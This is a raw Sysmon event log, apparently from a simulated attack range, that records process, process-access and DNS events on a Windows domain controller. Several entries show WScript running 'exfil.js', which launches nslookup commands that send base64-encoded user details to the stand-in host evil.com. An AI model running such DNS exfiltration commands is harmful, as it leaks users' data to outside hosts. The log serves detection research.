14:21:26.573{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-E342-000000005F02}7792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.568{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.567{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.567{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.567{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.550{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-E242-000000005F02}732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.550{2E1864BB-18E0-629A-6742-000000005F02}39766396C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-E242-000000005F02}732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.564{2E1864BB-18E6-629A-E242-000000005F02}732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvxo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.550{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlamdx.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000207076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.550{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87D4202F76543E710FC18CCC1B24CBC7,SHA256=D50C1ED7231607B04CD7B3B40A9B6713DE193A64650628B4A89A74BAA1C110A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000207075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.078{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60720-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.078{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60720-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.078{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50496- 354300x8000000000000000207072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.077{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50495- 354300x8000000000000000207071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.077{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50494- 354300x8000000000000000207070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.002{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61601-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.997{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61601-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.997{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50493- 354300x8000000000000000207067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.997{00000000-0000-0000-0000-000000000000}7296<unknown process>-udptruefalse127.0.0.1-50493-false127.0.0.1-53domain 354300x8000000000000000207066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.997{00000000-0000-0000-0000-000000000000}7296<unknown process>-udpfalsefalse127.0.0.1-50492-false127.0.0.1-53domain 354300x8000000000000000207065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.997{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50492- 354300x8000000000000000207064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.996{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50491- 354300x8000000000000000207063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.925{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local63127-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.924{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local63127-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.924{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50490- 354300x8000000000000000207060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.923{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50489- 354300x8000000000000000207059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.923{00000000-0000-0000-0000-000000000000}7620<unknown process>-udpfalsefalse127.0.0.1-50488-false127.0.0.1-53domain 354300x8000000000000000207058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.923{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50488- 354300x8000000000000000207057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.923{00000000-0000-0000-0000-000000000000}7620<unknown process>-udptruefalse127.0.0.1-50488-false127.0.0.1-53domain 10341000x8000000000000000207056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.519{2E1864BB-18E6-629A-E042-000000005F02}29325404C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-E142-000000005F02}4776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.519{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.519{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.519{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-E142-000000005F02}4776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.519{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.519{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.519{2E1864BB-18E6-629A-DF42-000000005F02}69807972C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-E142-000000005F02}4776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.520{2E1864BB-18E6-629A-E142-000000005F02}4776C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-DF42-000000005F02}6980C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlamdx.tmp 2>&1 10341000x8000000000000000207048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.503{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-E042-000000005F02}2932C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.503{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-E042-000000005F02}2932C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.488{2E1864BB-18E6-629A-E042-000000005F02}29325404C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-DF42-000000005F02}6980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.472{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-E042-000000005F02}2932C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.469{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-DF42-000000005F02}6980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.470{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.470{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 